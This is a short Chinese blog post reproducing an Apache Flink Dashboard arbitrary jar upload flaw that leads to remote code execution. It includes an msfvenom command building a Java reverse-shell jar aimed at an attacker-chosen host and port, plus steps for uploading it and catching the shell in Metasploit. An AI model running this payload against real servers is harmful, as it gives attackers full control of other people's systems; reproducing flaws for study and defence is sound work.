首页 > 编程语言 > 详细

Apache Flink Dashboard 任意jar包上传 Rce复现

时间:2021-03-11 17:46:16      阅读:23      评论:0      收藏:0      [点我收藏+]

0X01.漏洞原理

攻击者可利用该漏洞在 Apache Flink Dashboard页面中上传任意Jar包,利用Metasploit在Apache Flink服务器中执行任意代码,获取服务器最高权限,所以危害性较大。

0X02.漏洞复现

需要生成一个公网的IP地址exploit才能正常接收到msf反射的shell通道。使用端口转发工具在内网与公网之间形成映射

技术分享图片

有了公网IP,现在可以用这个POC生成Jar包

msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar

技术分享图片

上传jar包后,在msfexploit中Set LHOST,SET PORT后,点击submit

技术分享图片

成功监听。执行任意LINUX命令

技术分享图片

POC中的Lhost,LPort 为公网IP与端口。

MsfExploit中的Lhost Lport为Localhost和与公网端口有映射关系的的本地监听端口。

0X03.一些问题

1.使用NC监听失败,原因未知,msfexploit正常
2.下次尝试使用端口转发工具反弹shell

Apache Flink Dashboard 任意jar包上传 Rce复现

原文:https://www.cnblogs.com/Stunmaker/p/14517152.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!